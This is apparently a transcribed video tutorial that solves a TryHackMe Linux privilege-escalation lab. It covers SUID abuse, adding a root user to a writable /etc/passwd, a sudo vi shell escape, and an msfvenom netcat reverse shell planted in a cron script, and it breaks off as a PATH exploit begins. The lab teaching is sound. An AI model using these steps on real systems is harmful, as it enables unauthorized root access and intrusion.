Hey, what's up? Shikata Ganai here. We're going to go ahead and start a new series called Pop, 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 Another Server Drop, as we go ahead and grab some CTF challenges, some capture the flags, from a site called Try Hack Me. And what we're going to do is we're going to go down through those, spoiler alert, we're going to actually solve them, and we're going to describe exactly what's happening as we compromise the system and capture the different flags. And this is a good way to teach you how to actually further your different hacking skills for whatever cybersecurity career that you want to pursue. Hands-on and actually going down through and saying, this is why we're running this command, this is why we're using these switches, is a great way to go ahead and further your knowledge. And we're going to start today with one for Linux Privilege Escalation. So, without further ado, let's get to the video and stop popping, baby. Hey, what's up? Shikata Ganai here, and we're going to be starting a new series called Pop, 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 Another Server Drop. And basically, I'm using capture the flag boxes in war games to demonstrate or teach some different hacking techniques to further your skills to be a cybersecurity professional doing this sort of thing. And we're going to be focusing today on this particular series with Linux Privilege Escalation. And the reason why is because a lot of the machines that we're going to do in other videos coming up in this series is once we've compromised a machine, it's highly likely will probably be broken in as a standard user. And the idea is to be able to get to root access on a Linux machine to be able to go ahead and get what they call flags that they've put into these different machines. So I thought it would be a good idea to kind of start the series with this, because these are some of the techniques we'll use in later videos. Now, when I do each video, it will be self-contained, so the concepts I talk about in this one, if the concepts apply to the next video, I'll talk about it again there as well. So if it's the only video you see, you'll still get the full amount of information that you need. Because I just see so many different videos of doing these capture the flags that are well done, but they just kind of go through and they blast through the box and they say, yeah, this is what I did, and type this command in and do this, nmap tac n, blah, blah, blah. And I kind of want to take a different approach to that, where I kind of want to explain the process and the thought behind why we're doing that. Why are we using this command? Why are we using these switches with this command? So that's kind of my goal to teach through these capture the flag boxes. The one I'm using here for this series is called Try Hack Me. It's a great website. I highly recommend that you sign up and start blasting away at these. There's a free account and there's a paid account. The free one, you get a variety of rooms you can get into, and you can start hacking away at some different things and learning. The paid one, which is $10 a month, real cheap actually for what it provides, it gives you your own Kali Linux that you can run in a browser. It gives you access to all kinds of other different rooms that you wouldn't get with a free one. And I would highly recommend that. That's what I'm using here today. I'm going to use a virtual machine, though, from VirtualBox of Kali Linux to do this instead of the browser one, but you're more than welcome to follow along using that one as well. Now, in this particular case, we're focusing on Linux because that is a large majority of the web servers, and sometimes just servers in general, that you'll see out there outside of things like Active Directory, because they're very solid in how they run. They can run for years, you know, without having to reboot a lot of times, as opposed to Windows, which you always have to reboot, and you know, the wind blows and you have to do some sort of update on Windows and you have to restart it and all that kind of good stuff. So a lot of times it's a little bit more resilient to put it on a Linux machine. And if you're a Linux admin, you could probably agree with me on this. You're likely not going to be using a GUI to administer your machine. You're likely going to be using something they call a shell or a command prompt. In this case, looks kind of like this. And so when you break in as an attacker, that's likely what you'll get is this. So if you don't know what you're looking at here, then that's where the problems lie. That's why I always focus on, you got to learn some Linux stuff, because if you're breaking into a Linux machine, once you're in, you know, what then, right? You have to be able to navigate. So I expect there's a little bit, or assume there's a little bit of knowledge on your part for Linux, such as your common, you know, ls and cd and common stuff like that. Nothing, you know, no Linux guru stuff or anything like that. Just some basic stuff. So let's talk about privilege escalation. So privilege escalation can be done in a couple different ways. You have what they call vertical, and you have horizontal. So if I'm doing the horizontal, that means I'm breaking into a machine, and I've compromised the machine, and the person running the server is their user account credentials are not privileged. They're not root. I then use this machine to pivot to another one where that also has a user on it that's not admin or root, and I've compromised those credentials, and so on and so forth. That's horizontal privilege escalation. The vertical one is I break in as that standard user, but then I escalate to root. Now on Linux, root is kind of the God mode as you were on this one here. And a lot of the capture flags that you come across, they'll basically be looking, to finish the room by you getting the root flag. So typically the goal is, yeah, you break into the machine, but you want to get to root eventually. So that's what we're going to be talking about today. Now, one way you can do that is through a particular script called linynum.sh. Now, for this series, for this video, I'm not going to talk about how to compromise the machine itself, the initial compromise. This will be just what they call post-exploitation. Other videos I'll be doing will teach how to break into a machine from beginning to end, doing enumeration and all that. In this case here, they've given us credentials, they've given us SSH access, and we can log into the machine as that standard user. The goal is to use privilege escalation techniques to elevate higher. Okay, so we're not going into compromising the machine. So the goal is to SSH in as that user, simulate that we've actually broken in, and somehow get this script onto that machine. If we can get this script onto that machine, then we can run it and get a little bit more information enumeration-wise. So what I've done is I've downloaded it here to a directory that I have called for Linux enumeration. And what we're going to do in this particular case is we're going to start our own little web server. But first, let's go ahead and navigate into, or SSH in to that machine. So we'll say SSH, and the user in this case is user 3. And let's grab the IP address of the machine, which is right there. So your syntax for SSH is a way to terminal into another machine using an encrypted channel, as opposed to its older brother, the Telnet platform there. This one here, syntax is SSH, the name of the user, @ IP address. So in this case, there's the IP. Then it's going to ask you if you want to accept this certificate. I've already done it previously on this command prompt, so it's not going to ask me in this case here. But you'll hit yes or type in yes, and then it will get you asking for a password. So I'll put the password in. And we're now in as user 3. So if we do the command ID, this will tell you who you've broken in as. Okay, so you've broken in, and there's a person running this particular server, user 3. This case, the 1002 tells us it's a standard user. If it was a 0, that would tell me it was root. Okay, that would be the root privileges. Something else to note is the groups as well. So the groups in this case, 1002, tells me it's a standard user group, more than likely. There's other groups like 0, which would be root. So we're looking for any type of user access, because there's about 8 users, I think, on this particular machine. There's different permissions for each one, and we'll get into that a little bit later. All right, so we've broken in as, or we'll simulate that we've broken into the machine. We're now in as user 3. In order to serve it up, we're going to assume we're on the same network, just for the topic at hand. So in order to do that, I'm going to go ahead and serve it up from my IP address, which in this case would be the tunnel IP address, ton0. So if you use try hack me, understand that all the reverse shells and everything you'll do, you'll be using your ton0, which is your tunneled address. Okay, so I'll be using this one right there. So in this case here, what we want to do as the user is I want to go ahead and start up a web server. So let me go back over here. Now you can use one called from Python, and that particular one here is using Python 3. So we'll say Python 3, which is already installed on Kali Linux, and we'll say tacm http.server, if I can type it in correctly, and then a port number. In this case, we'll just say, I don't know, 8888. Sounds good. So in this case, let's just do 8000 in case that's too familiar with HTTP. So we'll go ahead and start this up, and what it will do is it will serve whatever's in this folder. Now in this case, the only thing in this folder is the linynum.sh. Now one thing to keep in mind is Linux is case sensitive. So if you type in small case L in this case, it wouldn't recognize it. So this is the file we're serving up. So now we have this web server running, and I'm at this IP address. This is my attack machine right here. So we're going to simulate that we're on the victim box here, and in order to get the actual file, we're going to use a command line thing called wget. In this case, we'll say HTTP and my IP address of my attack machine. And then there's going to be a colon because we're going to specify a particular port, in this case 8000. Okay, so that's what I'm serving up. And then a slash linenum.sh. Okay, so essentially that's doing a get of that file from my own crafted web server. It is now on that box right there. Okay, so once we actually have that bad boy on there, we have to do something where they call chmod. We're going to give it permissions. Now, if you do something called ls-tac-l, okay, what it will show is it will show some different properties of these files that are here in Linux. So for this particular one here, we see that it's a file by the dash. Over here, you see a D, that means a directory, folder. So in this case here, you have 3 different permissions sets, if you will. And this is what they would call the owner of the file. This would be the group of the file, of whoever runs that file, owns that file. And this would be everyone else. So these are different privileges that are there, but you can also see it says user 3 is the owner. User 3 would be the group, and it gives some other details like the size of the file, things of that nature. So what we want to do is give this particular ability to execute this particular file. So when you see RW, this means read and this means write. This one that's a dash that we haven't set would be X for executable. So if I wanted to give the owner of the file read, write, and execute access, I would have to change this to an executable status. To do that, you can use a tool called chmod. There's a variety of ways you can do it. You can do something called a +X. In this case, we're just going to go ahead and do a basics chmod, and the number privileges would be 777. And in this case here, the 7, well, actually, you probably don't want to do that. Well, just for demonstration, we'll just do it this way. This is typically not the way you want to do it because you don't want to give everybody executable privileges on this, but just for demonstration. So if I did 777, that's essentially saying read, write, and execute. And the first position that you have of it here is for the owner, which is these 3 here. And then the second one would be for the group, which would be these 3 here. And then the last 7 would be for everyone else. So if I did chmod 777, and we did it for this file, if I ran the ls-tac-l again, you'll notice that everybody has executable on it. Now, obviously, that's not the best practice. So you could do a chmod u +X to be able to go ahead and give that owner of it that particular privilege. But in this case, I just want to kind of demonstrate that. So now this is ready to go. We do a // whenever we want to run something called a shell script, right there, .sh. So we do a // and then the lin, and here you can do tab completion by hitting tab, and we'll go ahead and show the rest of it, and then hit enter. So this is going to run for a minute. Essentially what it's doing is it's going down through and it's trying to find some different exploitable parts of the Linux OS that it's actually on. Now, in this case here, some of the things we'll be looking for is the OS version, the kernel version probably, the host name would be good to know. If there's any files like etc passwd that are writable. Something else would be a suid bit, which we'll talk about in a little while as well. And it's just basically looking for any exploitable things that are running as root that maybe shouldn't be running as root. And then attackers would use this information to go ahead and further their attacks that they want to do in this case. So now that the scan is complete, pretty awesome tool or script. Now that that's complete, let's scroll up a bit here. And actually, I probably should have done something a little different first. So what I'm going to do in this case here that I forgot to do is I'm going to go to the preferences here of my command prompt. And just for what we're doing here today, I'm going to do an unlimited history so that it will let me scroll up to the very beginning of the command, because something that has this much output is going to be it's going to hit a stop point here at the top of your command prompt. So my apologies on that, but hey, showing you some cool things. So let's run that again real quick, and then we'll be able to scroll up further up on it. So some of the ways we're going to compromise today is going to be one with the suid bit. Another one's going to be called a cron job. There's another one called the path environment variable. Oh, actually, it ran pretty quick there. All right, so let's scroll up here and let's see what we have. So as you can see, there's quite a bit of verbose information, but I'll kind of point out some things that we are really looking for here, but I want to get the very beginning of it. Okay. All right, looks like getting close to the top here. All right, so here we can see some environmental things and the etc passwd. So let's get, should be right there. All right, so here's our test started. Gives us kernel versions right there. And some basic information here for the release. Now all they're doing in this case here is the script is running certain commands like uname -r. When I say tac, I mean dash. So that's kind of my wording for it there. But it gives us things like, the version, and if it's, Debian or whatever. Here's the host name, which is good to know. The current user information, which we already know. And we can see here there was some other ones that previously logged onto the system. Here's a user 8, so that's good to know. Here's all the different group memberships that are listed. As you can see here, we knew that 0 is root, and then further down, these 1000s down here are typically going to be your standard user accounts for that. Now this one here looks like we have some admin users, basically from the ADM. Now this is a very important file here, etc passwd. We're going to be actually messing around with this a little bit later as well. So in this case here, this tells us the user right over here to the left, and then the X would indicate that the actual salted hash of the password is in a different location that they call etc shadow. And you can't access that unless you're root in this case here. And so we're going to talk a little bit more about etc passwd, but if we scroll down, there's something to note. Is there's all of these users. We've got 6 here, 7, and 8. But something that's interesting is this right here. So when you're looking at user 1, X we said was the etc shadow. This would be the actual UID of the user, and this would be the GID, the group that user is a part of. Now in this case, we can see that user 7 is part of the standard user UID, but the group he's in is root. So that would be an interesting one to remember, user 7. Let's go down a little further here. Let's see, home directories. No, nothing there. Here's some available shells. If you're doing the Try Hack Me page, they're going to ask you for this, how many shells there are. This is where you find that information. There was another one. Here's some cron jobs, but we're going to look at the actual cron tab output instead, which is this one. So basically a cron job or cron tab output here is automated scripted tasks that happen at certain intervals, and this one is pretty interesting. It's from a particular user. We don't know what it is, but we know it does something, and I'll go into this a little further when we get there, but we can see that it runs every 5 minutes, so that'd be something interesting we may want to screw around with a bit. All right, name servers, other good information. Let me go down here to some more relevant stuff. These are all the different running processes. You can see it gets pretty insane here. The one I'm looking for is there's one that actually has a writable permission to etc passwd. So let me scroll down a little further here. See if I can find that. Let's see here. Sudo. Hey, there's the MySQL version. That's good to know. We're not going to mess with that today. Okay, here we go. Can we read or write sensitive files? It looks like a root can read and write etc passwd. Specifically, group. Now we knew there was a user 7, that can do, that's in that particular group. So we may explore that a little further down there. Sudo bit files, we'll talk more in detail when we get to that point, but this is essentially being able to run a file as the intended creator or owner. So that's pretty awesome stuff that we want to know about. This one here is an interesting Sudo bit, and again, we'll talk more about Sudo when we get to that portion. So we got quite a bit of detail off of this particular script. I think we're good to go to get rocking and rolling. So in this particular case, what we want to focus on for the first one is we want to kind of find some files with permission of maybe like owner, things like that. To be able to do that, you can use a find script here. So if I were to, find command. So in this particular case, I can do find and then a slash. Slash would tell us it's the beginning of the file system that we want to start from. And then we'll say -perm, which says we're looking for something with a particular permission set. In this case, we're saying tac-u, which would be the user, or the owner, whatever you want to call it, equals s. Okay, so this is what we're calling the suid bit. Okay, so when you actually set suid on something, SUID or SGID is another one, you're essentially saying that I want to go ahead and have the file be able to be run by anybody, but still have the permissions of the owner. So if the actual file is owned and has the permissions of root, setting a suid bit on that file says anybody that's in the machine can run that as if it's root. So for instance, a good usage of that would be something like passwd. So if you log into a Linux machine and you're a standard user and you want to change your own password, you obviously don't want to be given that standard user root access. You don't want to give them those privileges, but you can set the actual executable called passwd, which needs to run as root. You can give that executable a suid bit so that anybody that wants to change their password for that one command at that one time, it will run as root and change the password for the user. So that a standard user can just do a passwd, change their password, and no problem. But they're still not root, but they're running that one particular file as root. So we're looking for any files like that we can possibly compromise. So the u equals s would mean s for suid. We're saying that that first 3 sections, RWX, if there's an s in there instead of an x, RWS, that is the one we're looking for. That's our huckleberry. So in this case, that's what we're doing for our file. So we'll say u equals s, and then we'll do a dash type. And then in this case here, we'll say f for file. And then this one sometimes confuses people, the 2 bracket / dev / null. Essentially, if you don't put that in there, you're going to get a variety, a whole slew of different debug information and a bunch of error messages and this and that. It's going to clutter up the results. It'll have the real results in it, but there'll be so much other extraneous junk in there that we want to kind of throw it into this hole, this garbage hole collection called dev null. And that will just give us the legit output that we want. So we'll hit that, run it. All right, so we see there's a few different things. Now, if we look down here, we see there's a user 5, which we're not logged in as, we're in as 3. But then we do have a user 3 that has a suid bit for shell. Now, from any location, we can see it's in the home of user 3. So if you do a pwd, it will tell you what directory you're currently in. We can see we're in the home directory. So if we did an ls, we do see shell right there. Now in this case, if we did ls tac-l, I want to show you what the suid bit would look like. So you saw up here we had set the permissions for the linenum with rw and x, but you'll notice that this one here has an rws for the u section. As I mentioned, the first 3 is u, the next 3 is group, and the last 3 is everybody else, all, whatever you want to call it. So in this case here, this is the user owner of the file, and we know that that person has privileges of root, and the privileges are as root. So I, as a standard user 3, can run shell as if it is root in this particular case here. So let's go ahead and just run shell, and let's see what it does. So we'll do a / actually, if you don't know what it is, because you're looking at it, you're probably saying, well, wait a minute, Ray, there's no .sh. Well, what you can do is you can say the word file and shell, and it will tell you what it is. In this case, we do see it is an ELF 64-bit, essentially telling you it is an executable file. So to execute it, we're again going to do the ./shell like that, and let's see what it gives us. All right, so it pops out, says you can't find me, welcome to Linux, blah blah blah, and look at the user. Root. So if we do an ID, we can see we are indeed root. Pop, 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 another server drop. So from there, we can just ls, see what we got. We should be able to now navigate over to root, which is the home for root there. Let's go navigate over there. And nothing good there. Typically, this is where a flag would be of some sort for whatever the challenge is, but either way. So we've broken in as root, taking advantage of something they call suid, bit, SUID. So that's one thing you'll look for when you're doing your Linux enum with that particular script. You're looking for that particular thing. All right, let's go ahead and we'll go ahead and exit out of, we'll Control C out of this guy. Let's just do exit. All right, so we're back to user 3, standard user again. So let's go ahead and compromise the etc passwd one. Now, if you're following along in your Try Hack Me page, we just did the suid GUID file one here, which is the binary. Okay, the read, write, execute, all that kind of good stuff. And we talked about that suid bit, okay, extra bit number 4. And we already went over that. And here's that command we were doing, so everything's good there. All right, so the next one is this etc passwd. Okay, so in this case here, we already saw through that script that there was this file was able to be done or written to by whoever's in the user group for root and whoever the user is as root. We already know that user 7 is a member of the group for root called 0. So in this case, we're going to try to navigate over and use that particular guy to see if we can actually write ourselves a root user into etc passwd. All right, so let's go back over here. Now we don't need this server anymore. Let's go ahead and Control C out of that. And let's minimize some of our windows. All right, so we're going to now do a command called su. Now this means switch user. So we know there's another user on the box called user 7. So we're going to switch over to user 7. It's going to ask for that person's password. Now again, we're simulating that compromise has already happened, right? So in this case here, we can go to the home directory here for user 7, and let's do that real quick. Awesome. And you can see here by doing ID, which is your best friend, you want to use that ID all the time. We can see that the guy is a standard user, but we can see that the group he's in is root. So that's kind of where we're going with this one here. All right, let's go back here real quick and take a look at some of this etc passwd nonsense. So a typical entry would look kind of like this. So if I were to go ahead now currently and do the word cat. Now cat allows me to go ahead and display the contents of a file, like a text file, here in screen. Okay, so if I'm broken into a terminal but I don't have a GUI, so I can't bring up Notepad or whatever, I can use cat to display the contents of a text file. In this case, everything in Linux is a file, so we'll say cat etc passwd, just like that. So this right here will give us all kinds of different information about the different users that are on there, but it doesn't actually have the passwords because those are stored in a different file called etc shadow. So if we were to cat that, we would have to be root to do that. In this case, we're seeing this here is a typical line you would see in that file. So if you come back here and you look at that syntax, we can see everything is separated by a colon. First thing we have in the first slot is the username, in this case test here. Then the next would be the password. In this particular case, we would have to physically give it a password, so we'll do that. Then the next section you'll see is the user ID. In this case here, 0 would be root. Then the next you would see is a group ID, so the 4th field would be the group ID. The 5th field would be info about the actual user ID. Now there's a command in Linux called finger, which utilizes this field to display information based off of that. This one here would be the home directory right there, /root. And then the next section here, or the last field, would be the command shell that they use. Now there's this one, which is the bin bash, but there's also bin sh is another one that it originally started from, and bash is kind of built on top of that or whatever. That's kind of the syntax that you want to use to be able to do this particular hack here. So let's go over here, and we can see that we have this cat etc passwd in this case here. So what we want to essentially do is we want to go ahead as user 7. We want to make a salted password hash and create a new user and give it root privileges. And then we can sue over to that person and get root access. All right, so first thing we want to do is create a salted hash. Now when I say salted, I basically mean add in more variables to a hash to make it more difficult to crack. Now if you're not familiar with how they crack passwords, Typically, you'll see passwords stored in a hashed format. Now, hash is a one-way function. It's not reversible. And the only way you can really essentially crack a hash is to compare it to another hash that has a known plaintext value. So for instance, if I took the word Chuck Norris and I hashed it, it'll give me an output. Okay? That output is always going to be that exact same output if I hash it again the exact same way. Now, if I were to take that certain hash algorithm, let's just say SHA-1. If I were to take that and I were to hash a whole dictionary full of words, I now know the plaintext value of each hash that I've made in this massive list. This massive list is something they call a rainbow table. And what they would do is they would say, I've captured a hash from a machine. Let me compare that hash to this list of hashes that I've made called a rainbow table. And once a match happens where a hash is exactly the same as the hash in this list, we look at the hash in this list and we look at the plaintext value of it. Now we know what the password is. That's essentially how it's done. Now, to give that some more variable or variance to it, we can add a salted value, which is a, it can be any type of bit value, 32-bit value, 24-bit value, whatever, to give it more entropy or more randomness to that particular one, to make it more difficult for someone to use this to crack it. Linux does what they call a salted hash for their different users that they have. And then the Windows version, which would be the NTLM stuff, they don't typically do the salt on those. So those are sometimes a little bit easier to crack in some cases, depending on the size of the password. So in this particular case, when I say I want to make a salted hash, that's because I want to make a password that can be used here in FCPassWD. To do that, we can use a tool called Openssl. So let's do Openssl. And in this case, anytime that you want to find out what you're doing with a command, you can always say man, and then you can go ahead, and that's the manual page, Openssl. And as you go down through, you'll be able to see all the different commands and switches that it's using, or that you can use to do it. In this case, we're going to be using this one. We're going to generate a hashed password. So we're going to be using the passwd in this case here. And it's a massive document, so I won't go down through all of it, but we're basically setting the number one, which I can't remember which hash that is, but either way. I'm going to hit Q for quit. So we're going to use that tool and that particular function to be able to create this password. So we'll say Openssl, and we'll say passwd, and we'll do a -1, and we'll say -salt, because we want to make a salted version of this using the number one, whatever the hash is for that. I forget what it is. And then I'll say the user is called, I will say, I don't know, Leroy for Leroy Jenkins. And then we'll say the password hash is Jenkins, or the password is Jenkins. So we'll say Leroy for the username, Jenkins for the password, and we'll hit enter. What it will now do is it will output this value for us to use in this particular field. Okay, so now that we have that, let's go ahead, because we're user 7, we have the ability to do this. We're going to use a tool called Nano. Nano is a text editor. There's another one called Vi that's pretty popular, and they allow you to use the command prompt text editor as opposed to a GUI text editor like Notepad. So in this case, we want to go ahead and nano the etc/passwd, and let's scroll down to the very bottom, and we'll add old Leroy. So in this case, we know the syntax based off of this, right? So we're going to put Leroy, we're going to put the password hash, right, and then follow the rest of the syntax here. All right, so in this particular case, let's do Leroy, and then we'll do colon, and let's go up and grab our, shoot, I forgot. Let me exit out of this real quick. I forgot to copy that hash. All right, so let's grab this, and let's copy that over here, and we'll just keep that in our little notes section there. All right, let's go ahead and nano this again. Scroll down to the bottom, And let's put our Leroy in there. Right there. So we'll say Leroy. Then we'll do our colon. There's our hash. Another colon, 0, colon, 0. So this is telling us group and user ID, our root. And then for the finger command, we'll give some information about it, which is root in this case. And then we want to give the home directory, which in this case is /root. Notice how I'm putting I'm putting a colon in between each value here. And then the path to the shell for that is /bin bash. Okay, so we now have a Leroy who has root privileges, and we're creating them from scratch, and we should be able to log in as them. So let's try it. So let's Control X out of that. Y, enter. Awesome. So now we should have, if we cat etc passwd, we should now have old Leroy there at the very bottom. Okay. All right. So let's sue over to Leroy, which again means switch user. Put the password in of Jenkins. And if we do ID, pop, another server drop. There we go. So we got root by going ahead and modifying the actual etc passwd file. So you can see that if you do your linux sh and you find the ability to be able to write to etc passwd as a particular user or group, that's your huckleberry. That's what you want right there, because you can do something like that. All right, awesome. Let's exit out of that, back to user 7. All right, next thing we're going to do is we're going to exploit something called Sudo, which is our Sudo privileges. So what I'm going to do is there's a particular user that does have some Sudo privileges, and that's user 8. So we're going to go ahead and switch our user over to user 8 and put the password in. And you can see here, ID, again, all fields mean they're just standard user, even the group, right? So we don't have, they're not in a root group. Now, for those that are more familiar with Windows, there is a particular command that when you right-click a file, if you know the password for the admin, you can say run as admin, and then put the password in, and you're logged into Windows as a standard user, but you're running this particular file as an admin. So take that same concept and apply it here to Linux with something they call Sudo, or Sudo privileges. So if you were to have broken into this machine and you're logged in or broken in as user 8, one of the very first things you do after you do ID is then you do something called sudo tac L. In this case here, it's going to list any privileges this person has for sudo. And essentially it just means that whatever the file is, in this case here, it's a program called Vi, which is akin to the one I use, the Nano one. It's a text editor that a lot of people use. There's always kinds of big wars and debates on all these different Linux forums about which one's better. Whatever, it doesn't really matter. They still basically do text editing. So we can see here that we can run Vi as sudo, okay, as root, which is handy to have. Now there is a website that you should probably know as a hacker for this sort of thing. And it's called GTFO bins. It's a great website which gives us a variety of different privilege escalation type of commands and shells to be able to run. And when you're at this site here, you can type in whatever you want. So here I'll just say Vi, because we know we have sudo privileges for Vi. I want to see if there's any exploits for Vi as sudo. All right, so we see Vi, and okay, so let's do, here it is. So Vi, so we got shell, file write, file read, but we have sudo privileges. Let's click that. All right, so it's telling me here that if we were to run sudo, and this basically is how you would run the commands for running as admin. If you had a command you wanted to run, like Vi, you would do sudo, and then you would say Vi, and then whatever you want to Vi, the name of the document. It will then ask you for your standard user password, not the root password, for your password. Once you've done that, it will run that program as root. Okay, that's the syntax. So we're seeing that's kind of what's going on here, is we're running sudo Vi, but the command we're running is this one, which will actually go ahead and do a pop out, if you will, of doing bin sh. Now bash, the one we've been using, that you've been seeing here, is like sh, but bash has a lot more features. Sh, I think, was one of the original ones way back in the day. It was It was created for Linux distributions or Unix or whatever you want to have it for. And whenever you see that shebang, which is that little exclamation point, sometimes you'll see like a hashtag shebang or whatever, at the head of a script, it's telling your system that this file is a set of commands that are to be fed to the command interpreter that is indicated. In this case here, we're trying to send a command and open up bin sh essentially here. And this, again, is our little garbage collector that will push stuff that we don't need over there. So if we take this and we run it as user 8, which we're at now, it's going to ask for my, well, I don't have to ask for my password because I've already run, in this case, as it I've already entered my password. So then it just drops us into this little hashtag here. But if I do ID, pop, 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 another server drop. So we're rocking and rolling, and we now have access thanks to old GTFO bins hooking us up. So yeah, that's essentially how you would get it when you have a sudo privilege such as that. Now, a lot of times you can also do the same thing where, whoops, I'm sorry. And if you get into this situation and you want to get out of vi, you can do a colon, and it will just automatically pop it in on the bottom. And you can say WQ to quit, write and quit, and it will bring us back to this screen here. So with sudo, every time you break in and you get access to whoever the user is, always do a sudo tac-l and see what they can run as root. Sometimes you may get access to, etc as sudo. Then you can do the etc passwd or whatever, and do the right file that we did for that last exercise. So pretty cool stuff. All right, so we also saw during the Linux script that we did before, we saw there were some cron jobs that were running. And the cron jobs, in this case here, were the automated jobs that would run on a system. Let me go back here because they actually describe it pretty well on this page. Okay, so we've done all that. Let's go to cron tab. So with the cron tab, the format of it is in the order of it is, because it's kind of hard to read when you look at it initially. But it will start with an ID, and then we'll do a minute, hour, day of month, day of week, user, and command. Okay. Now, in order to see this particular output, we would do this command right here, cat etc cron tab. So let's do that real quick. As we're in as user 8 in this particular case here, excuse me, we can see autoscript.sh. So as I mentioned, the first field that you see here is ID, minute, hour, day of month, day of week, user, and the command that would be run or never, interactively automated or whatever during that time. So in this case, we're seeing that every 5 minutes, this script runs. And it looks like it's under user 4, so I suppose we can probably log in as user 4. So let's go ahead and sue over to user 4. All right, let's print our working directory, and we are in user 7. We don't want that, so let's navigate over to user 4. All right, so I don't see AutoScript, so let's check the desktop, see if it's over there. There it is. Cool. All right, so we have autoscript.sh here, and we can cat that just to see what's in it. So we'll say autoscript.sh. All right, so it says touch home user ABC text. I will automate the process. Okay, so every 5 minutes, it runs this script. Okay. Now what we're kind of wanting to do is we want to go ahead and give it a reverse shell payload, and then when the 5 minutes comes up, we're hoping it'll pop and run that payload and allow us to have access. So in order to do that, we're going to do a particular one called Msf Venom, or use a tool called, a creator of payloads called Msf Venom. So to do that, we're going to go back to our normal attack machine, not the machine we're broken into, because they probably don't have Msf Venom on it. It's part of the Metasploit framework. So we'll say Msf Venom. So we're going to do attack P, which stands for payload. In this case here, our payload that we want to use is a command cmd/unix/reverse_netcat, which I'll explain here in a minute. And I need my IP address. And again, if you're using this try hack me, the reverse shell IP address is always going to be your ton 0, okay, not your ETH 0. It's going to be your tunneled address. So in this case, this will be our Huckleberry here, because what the next thing it needs is an L host, which means a local host to connect back to. And I'll explain kind of what we're doing here in a minute. So I'm going to put that down as the IP address for the attack machine. So what we're doing is we're using a tool called Netcat. Netcat is a Swiss Army knife of hackers. They love using it. It's a great connectivity tool. A lot of people use it for what they call a reverse shell. The idea is that in a firewall, a typical stateful firewall, if I make a request from inside the network outside to the world through that firewall, the firewall will record that request and say, okay, this dude asked for this particular connection. So when the actual page comes back, it knows in the statefulness of the firewall, okay, this is a legit request. It was asked from the inside to the outside. Now, if it was just somebody from the outside throwing a random connection request to somebody inside, the stateful firewall will say, hey, I don't have anything on record that anybody inside asked for that garbage. Get it out of here. Okay, get it out of my face. In this case, what we're trying to do here is we're trying to do a reverse shell, which means we're going to try to trigger the attack machine to do a request out to us, outside through the firewall, and that way we can connect in, hopefully bypassing the stateful firewall, not really necessarily bypassing it because it's doing what it's told, but we're trying to take advantage of that issue, that statefulness of it. So the reverse shell will happen where on my machine, I will listen on a particular port. On the script I'm going to create and have run from the victim machine, it's going to go ahead and ask to connect to that reverse shell that I am running. And then once that happens, we should have shell access from that victim machine. We should now be able to do what we want as if we were shell on that particular machine. So to do that, we need a connect back address back to the attack machine. In this case, that's my L host. L port, you can do anything, you know, you can do 443, you can do whatever. For this, I'll just, I don't know, we'll say 888, sounds good. And we'll do attack R, which means raw, because I don't want to create a file that I have to put onto that machine because the antivirus may pick it up. So in this case here, we're going to actually just create a one-liner reverse shell. And what we want to do is take that one-liner, stuff it into autoscript.sh and replace whatever's in there right now with that one-liner, so that when we save it, the next 5 minutes, it will run that one-liner, thus connect us through reverse shell. That's the idea. So we'll do attack R so we can get a raw output. And you'll recognize it with a, I think it's MKFI something. There it is. Yeah, so this right here is the one-liner. Okay, go ahead and copy that. Now, I also want to start a listener on this side first. NC would be the name of the Netcat executable. And I want to do a, if you do TAC H real quick here for help file, what I want to do is I want to start a listener, okay? And I want to be verbose with the information coming out. And then I want to list a port to be listening on. So I'm going to be using those switches. So we'll say NC TAC LVP, and we had, what was it, port 888, I think? I'm pretty sure. Yep. All right, so we got, hit enter. All right, so now it's listening for anything coming to port 8888. I'm hoping in 5 minutes that this will come through to 888. That's the idea. All right, so let's go back here and let's nano the auto script. And let's go ahead and get rid of all this nonsense here. We don't need any of that. I'm doing a control K at the beginning of a line. That's to cut text. And what we're going to do is we're going to grab the shell that we made here. And let's go ahead and pop that bad boy in there. We're going to do a control X to save it. It's going to ask us if we want to save it. Yes. So I hit Y. Name, autoscript SH. We don't want to change that. So I hit enter. Awesome. All right. So now let's just verify. So we'll cat it just to verify that it's created. Awesome. So there's our script and it's running. So in about 5 minutes, we're hoping, that this will go ahead and pop this here with a shell. So again, the idea that we're using is to try to go ahead and try to get around some stateful firewall business to be able to make this connection, because it's basically saying that this victim machine here is asking us, the attack machine, for a connection. And once that happens, then we have a command shell, and we should be able to go ahead and do ID and see that we're logged in as whoever, whoever this machine is, in this case here, that we're running it as. And that's kind of the idea that we're running for this. And because it's on a cron job, we have to wait 5 minutes, because that's what that cron job said, that it would run autoscript.sh to be able to do that. So while we're waiting on that, some of the awesome different tools that you can get in Kali Linux are already installed. And if none of these that I'm talking about are installed on the distribution you're using, you can go ahead and just install them on any Linux distribution essentially. But the main ones here being the Netcat. But to do the Msf Venom, you'll be using something called a Metasploit framework, and that's a kind of the de facto exploitation tool that a lot of bad guys and good guys will use to create different exploits or to compromise different machines, because there's a lot of different up-to-date exploits that are found on that particular one. It's actually maintained quite well for what it does. And one of the tools that are there when you install for it is called Msf Venom. Now, and Msf Venom can make a variety of different payloads, and you'll see things like just regular reverse shell. Sometimes you'll see like a PHP one. There'll be PHP one-liners, all kinds of different things. And again, if you're in a situation where you do need a different type of one-liner type of deal, there's also another site that's pretty popular. It's called Pentest Monkey, and they have a lot of cool reverse shells on there. So if you go to Pentest Monkey here, there'll be a variety of different shells that are listed here. So like, for instance, if we say reverse shell, there's a particular one there, but we're actually looking for the one-liners. So let's say Pentest Monkey one-liners. There it is, cheat sheet. Oh, contains harmful programs. That's because it's actually using and hosting different reverse shells. So in this particular case here, can we ignore the risk? Yes. Okay. So in this particular case here, be very careful about where you visit, obviously. But in this one here, I do know it is just a variety of cheat sheets of one-liners, and it looks like it's kind of hanging up. So you can always just go and type in reverse shell one-liners, and there will be a variety of sites that copy and paste from Pentest Monkey. So here's an example of one here. So here's some different ones that you can do. The one we're doing, I can't remember where that's at, but there's a few of them down here. This one right here. So the Netcat one. This is the one that we're actually incorporating into ours. Speaking of which, let's go back and check, see what's going on with that. Boom, look at that. All right, so it looks like we have a connection. Boom, pop, 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 another server drop. So we can see there that we're in as root, which is pretty awesome, on that other machine. If config, verify 176.30 in that case, and that's what we should have right there. Boom, there it is. All right, so cool. So we do now have root. All right, so that's how to do it through that, through a payload. All right, so one more to go. Let's do like a path exploit. So let's go ahead and Control-C out of this, and that will cut off our reverse connection. Come back here, and we're back in as user 4. All right, so in this particular case, we're going to be doing, we're going to sudo over to, su over to user 5, and there we go. Make sure not root. Yep, not 